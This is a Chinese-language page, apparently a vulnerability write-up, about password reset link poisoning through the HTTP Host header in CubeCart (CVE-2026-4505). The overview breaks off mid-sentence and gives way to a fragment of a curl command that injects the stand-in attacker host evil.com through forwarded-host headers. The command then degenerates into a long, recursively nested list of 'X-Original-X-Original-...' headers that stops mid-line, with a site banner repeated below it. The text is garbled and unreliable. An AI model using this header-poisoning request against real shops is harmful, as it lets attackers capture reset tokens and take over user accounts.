CubeCart 预认证密码重置链接投毒 (CVE-2026-4505)

漏洞概述 漏洞名称: Pre-Authenticated Password Reset Link Poisoning via HTTP Host Header (通过 HTTP Host Header 进行预认证密码重置链接投毒) CVE ID: CVE-2026-4505 CVSS 评分: 8.1 / 10 (高危) 影响版本: CubeCart " \ -H "X-Real-IP: 127.0.0.1" \ -H "X-Forwarded-Proto: http" \ -H "X-Forwarded-Host: evil.com" \ -H "X-Forwarded-Port: 80" \ -H "X-Forwarded-Server: evil.com" \ -H "X-Original-URL: /index.php?act=recover" \ -H "X-Original-Method: GET" \ -H "X-Original-Host: localhost:8091" \ -H "X-Original-Port: 80" \ -H "X-Original-Proto: http" \ -H "X-Original-Scheme: http" \ -H "X-Original-Path: /index.php" \ -H "X-Original-Query: act=recover" \ -H "X-Original-Fragment: " \ -H "X-Original-Referer: http://localhost:8091/index.php?act=recover" \ -H "X-Original-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" \ -H "X-Original-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8" \ -H "X-Original-Accept-Language: en-US,en;q=0.5" \ -H "X-Original-Accept-Encoding: gzip, deflate" \ -H "X-Original-Connection: close" \ -H "X-Original-Upgrade-Insecure-Requests: 1" \ -H "X-Original-Cache-Control: max-age=0" \ -H "X-Original-If-None-Match: W/"60b0a0d1-249d1"" \ -H "X-Original-If-Modified-Since: Mon, 24 May 2021 10:00:01 GMT" \ -H "X-Original-TE: Trailers" \ -H "X-Original-DNT: 1" \ -H "X-Original-Sec-Fetch-Dest: document" \ -H "X-Original-Sec-Fetch-Mode: navigate" \ -H "X-Original-Sec-Fetch-Site: none" \ -H "X-Original-Sec-Fetch-User: ?1" \ -H "X-Original-Sec-GPC: 1" \ -H "X-Original-Priority: u=0, i" \ -H "X-Original-Cookie: $COOKIE" \ -H "X-Original-From: " \ -H "X-Original-X-Real-IP: 127.0.0.1" \ -H "X-Original-X-Forwarded-Proto: http" \ -H "X-Original-X-Forwarded-Host: evil.com" \ -H "X-Original-X-Forwarded-Port: 80" \ -H "X-Original-X-Forwarded-Server: evil.com" \ -H "X-Original-X-Original-URL: /index.php?act=recover" \ -H "X-Original-X-Original-Method: GET" \ -H "X-Original-X-Original-Host: localhost:8091" \ -H "X-Original-X-Original-Port: 80" \ -H "X-Original-X-Original-Proto: http" \ -H "X-Original-X-Original-Scheme: http" \ -H "X-Original-X-Original-Path: /index.php" \ -H "X-Original-X-Original-Query: act=recover" \ -H "X-Original-X-Original-Fragment: " \ -H "X-Original-X-Original-Referer: http://localhost:8091/index.php?act=recover" \ -H "X-Original-X-Original-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" \ -H "X-Original-X-Original-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8" \ -H "X-Original-X-Original-Accept-Language: en-US,en;q=0.5" \ -H "X-Original-X-Original-Accept-Encoding: gzip, deflate" \ -H "X-Original-X-Original-Connection: close" \ -H "X-Original-X-Original-Upgrade-Insecure-Requests: 1" \ -H "X-Original-X-Original-Cache-Control: max-age=0" \ -H "X-Original-X-Original-If-None-Match: W/"60b0a0d1-249d1"" \ -H "X-Original-X-Original-If-Modified-Since: Mon, 24 May 2021 10:00:01 GMT" \ -H "X-Original-X-Original-TE: Trailers" \ -H "X-Original-X-Original-DNT: 1" \ -H "X-Original-X-Original-Sec-Fetch-Dest: document" \ -H "X-Original-X-Original-Sec-Fetch-Mode: navigate" \ -H "X-Original-X-Original-Sec-Fetch-Site: none" \ -H "X-Original-X-Original-Sec-Fetch-User: ?1" \ -H "X-Original-X-Original-Sec-GPC: 1" \ -H "X-Original-X-Original-Priority: u=0, i" \ -H "X-Original-X-Original-Cookie: $COOKIE" \ -H "X-Original-X-Original-From: " \ -H "X-Original-X-Original-X-Real-IP: 127.0.0.1" \ -H "X-Original-X-Original-X-Forwarded-Proto: http" \ -H "X-Original-X-Original-X-Forwarded-Host: evil.com" \ -H "X-Original-X-Original-X-Forwarded-Port: 80" \ -H "X-Original-X-Original-X-Forwarded-Server: evil.com" \ -H "X-Original-X-Original-X-Original-URL: /index.php?act=recover" \ -H "X-Original-X-Original-X-Original-Method: GET" \ -H "X-Original-X-Original-X-Original-Host: localhost:8091" \ -H "X-Original-X-Original-X-Original-Port: 80" \ -H "X-Original-X-Original-X-Original-Proto: http" \ -H "X-Original-X-Original-X-Original-Scheme: http" \ -H "X-Original-X-Original-X-Original-Path: /index.php" \ -H "X-Original-X-Original-X-Original-Query: act=recover" \ -H "X-Original-X-Original-X-Original-Fragment: " \ -H "X-Original-X-Original-X-Original-Referer: http://localhost:8091/index.php?act=recover" \ -H "X-Original-X-Original-X-Original-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" \ -H "X-Original-X-Original-X-Original-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8" \ -H "X-Original-X-Original-X-Original-Accept-Language: en-US,en;q=0.5" \ -H "X-Original-X-Original-X-Original-Accept-Encoding: gzip, deflate" \ -H "X-Original-X-Original-X-Original-Connection: close" \ -H "X-Original-X-Original-X-Original-Upgrade-Insecure-Requests: 1" \ -H "X-Original-X-Original-X-Original-Cache-Control: max-age=0" \ -H "X-Original-X-Original-X-Original

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

CubeCart 预认证密码重置链接投毒 (CVE-2026-4505)

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CubeCart 预认证密码重置链接投毒 (CVE-2026-4505)

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！